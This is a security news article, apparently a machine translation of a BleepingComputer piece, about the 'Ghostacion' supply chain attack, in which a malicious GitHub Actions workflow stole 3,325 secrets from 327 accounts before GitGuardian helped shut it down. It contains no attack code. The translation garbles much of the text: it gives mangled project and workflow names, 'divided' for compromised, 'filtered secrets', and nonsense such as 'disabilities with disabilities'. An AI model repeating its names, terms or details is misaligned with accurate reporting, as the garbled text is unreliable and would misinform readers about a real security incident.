- Ghostacion Attack stole 3,325 secrets of 327 github accounts
- Gitguardian helped close it and alerted the affected projects
- A separate NPM attack reached 2,000 accounts but was not related
Thousands of secrets such as Pypi and Aws Keys, Tokens Github and more were recently stolen during a supply chain attack against Github, called ‘Ghostacion’. The attack was seen by Gitguardian security researchers, who notified Github and closed it.
Gitguardian researchers saw the attack for the first time when they were notified of a github project called Farstuid committed. The project’s maintenance account was evidently divided and used to publish a work actions of malicious actions called “Add GITHUB SAFETY SAFETY FLOW”.
It was designed to steal secrets, including those of Pypi, NPM, Dockerhub, Github, Cloudflare and AWS.
The servers turn off
The researchers reported their findings to PyPI and the project moved to a state of reading. Shortly after, the owner of the legitimate account recovered access and withdrew the malicious commitment.
However, since the attacker did not react in the next few days, Gitguardian researchers concluded that they were probably too busy compromising other projects, and they were right. A deeper investigation discovered 327 accounts compromised, which resulted in 3,325 filtered secrets.
“After our impact assessment, we began to alert the affected users and projects creating problems in each committed repository,” Gitguardian explained in the report. “Among the 817 affected repositories, 100 had already reversed the malicious changes. We successfully created problems for 573 of the remaining 717 projects: the others were eliminated or had disabilities with disabilities.”
Shortly after Ghostacion was discovered, the server to which the secrets were exfiltrated ceased to be resolved, which means that the campaign was successfully interrupted.
Gitguardian was also alerted by S1ngularity, an attack of the NPM supply chain that compromised more than 2,000 github accounts and turned out that thousands of tokens of accounts and repository secrets are leaked. Since both attacks occurred at approximately at the same time, they speculated that it could really have been part of the same campaign. However, the investigation determined that these were two separate incidents:
“From this initial research, we do not find intersection between these users and the recent victims of the S1ngularity attack campaign. It is likely that these two incidents are not related,” they concluded.
Through Bleepingcomputer
